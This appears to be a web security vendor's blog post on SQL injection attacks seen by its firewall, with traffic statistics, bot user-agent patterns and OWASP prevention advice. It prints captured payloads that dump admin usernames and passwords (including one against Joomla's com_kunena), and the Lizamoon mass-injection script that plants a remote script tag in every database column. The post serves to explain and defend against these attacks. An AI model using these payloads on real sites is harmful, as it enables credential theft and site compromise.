We are starting a new series of articles where we will talk about different active website attacks we are seeing.
The first one we will cover is known as a SQL Injection (SQLi). Some might know what a SQL Injection (SQLi) attack looks like, but assuming you don’t, it’s an attack that leverages an injection technique to manipulate and / or further exploit your SQL based database. It does this by passing queries and commands to your database, often via input forms on your website. The Open Web Application Security Project (OWASP) defines an SQLi attack as:
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. – OWASP
An example of what an attack may look like can be seen in the following query:
SELECT subject from posts WHERE subject LIKE '%$subject%';
If the $subject variable can be manipulated by a bad actor. Manipulation can include modification of data, display or listing of data and possibly even insertion of new data. In some special cases, it can also be used to execute shell commands and / or dump passwords (tip: MySQL Load_file function). To give a extreme example, this is the screenshot from one or our researchers doing a penetration test against a vulnerable application:
Our researcher was able to use load_file() to dump the password list from the server.
What we’ve provided here is a very watered down summary of what SQLi is and what it’s important to you, if you are a developer or enduser we recommend you invest more time understand this attack vector and its implications to your website. A good resource is the OWASP – Testing for SQL Injection page.
SQL Injection Attacks
We are currently seeing more than 50,000 attacks per day that fall into our SQL Injection categorization. Most of them are automated and try to compromise well known vulnerabilities in common CMS’s and web projects (Joomla, WordPress, vBulletin, etc).
This is the attack fluctuation for SQLi attacks, month over month:
The number of attacks we are detecting is growing each month, this is to be expected though as our Website Firewall product continues to grow. Overall though, the number of SQL injection attempts continue to grow.
If we drill down into our data and hook it up to a geo locator we can also see that the attacks come from everywhere. Most people tend to think that Russia, Brazil, Romania and a few other countries are the “bad” sources, but for SQL injection, the top attackers come from the USA, India, Indonesia and China:
So unless you only service one specific country and don’t care about the rest of the world, Geo blocking is not a good protection against automated SQL injections. What we found interesting is that most bots still like to fake themselves as either Google, MSIE 6 or set no user agent at all:
16%- MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) 13%- Googlebot/2.1; +http://www.google.com/bot.html) 11%- No user agent
Just by blocking these anomalous requests, you can get ride of 1/3 of all automated injection attempts.
The attacks really vary from each other, but we feel most can be classified into two categories:
1- Data Exfiltration
Data exfiltration via SQL Injection is what has contributed to some of the largest data breaches to date. The attackers find a vulnerability
that allows them to list all tables and dump all user accounts, emails and passwords.
Here is an example of what we consider data exfiltration, this is an active attack via our network:
/NewsType.asp?SmallClass='%20 union%20select%200,username%2BCHR(124) %2Bpassword,2,3,4,5,6,7,8,9%20from%20admin %20union%20select%20*%20from%20news%20where%201=2%20and%20''='
You can see the smallclass variable was not being properly filtered, instead of accepting the Class ID, it allowed the attackers to run a query to the database to list all username and passwords from the admin table.
Had the user not been leveraging a Website Firewall, the attacker would have had his information compromised. This is a very good example of this classification, it demonstrates well what the attack looks like.
This is another example:
/index.php?view=article&id=422:undef&catid=170:2014-service-providers&Itemid=713&option=com_content'%20%20and(select%201%20from(select%20count(*), concat((select%20(select%20(select%20concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F, 0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72)%20from%20%60information_schema%60.tables%20limit%200,1)) %20from%20%60information_schema%60.tables%20limit%200,1),floor(rand(0)*2))x%20 from%20%60information_schema%60.tables%20group%20by%20x)a)%20and%207=7%20%20and%20''='
This code is a bit more complex, it tries to do the same form of exfiltration.
Another one we are seeing very often is against Joomla’s com_kunena module, attempting to exploit the latest disclosed vulnerability:
/index.php?option=com_kunena&func= userlist&search=%25'/**//*!aNd*//**/1=2)/**//*!uNioN*//**//*!SeLecT*//**/1,/*! concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7 c,usertype)*/,/*!concat(0x3b3b3b,username,0x3e3e3e,password,0x7c7c7c,usertype) */,4,5,6,7,8,9,10,11,12,13,14,15/**//*!fRoM*//**/j os_users/**//*!WheRe*//**/usertype=0x53757065722041646d696e6973747261746f72/**/ /*!oR*/usertype=0x41646d696e6973747261746f72%20-- %20;
2- Code Injection
We don’t see these very often, they often rely on some initial vulnerability pre-tests that we block automatically via our Website Firewall making it that much harder to record and attempt. A good example of malicious code injection happened with the old Robint/Lizamoon type of attacks against IIS web sites.
It was running this code:
0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=’u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec(‘UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696 E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where ['+@c+'] not like ”%robint%”’) fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;–
SQL Injections are a real threat, they are being actively attacked and exploited every day. If you are a developer you should be leveraging the OWASP SQL Injection Prevention Cheat Sheet at a minimum. In it you will find recommendations categorized into two groups Primary and Additional Defenses.
Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Also Enforce: Least Privilege
Also Perform: White List Input Validation
Now my question is to you, those reading this and interested in the data, what additional information would you like to see in our reports and posts? We’re always looking for feedback and insights to improve our content and contributions.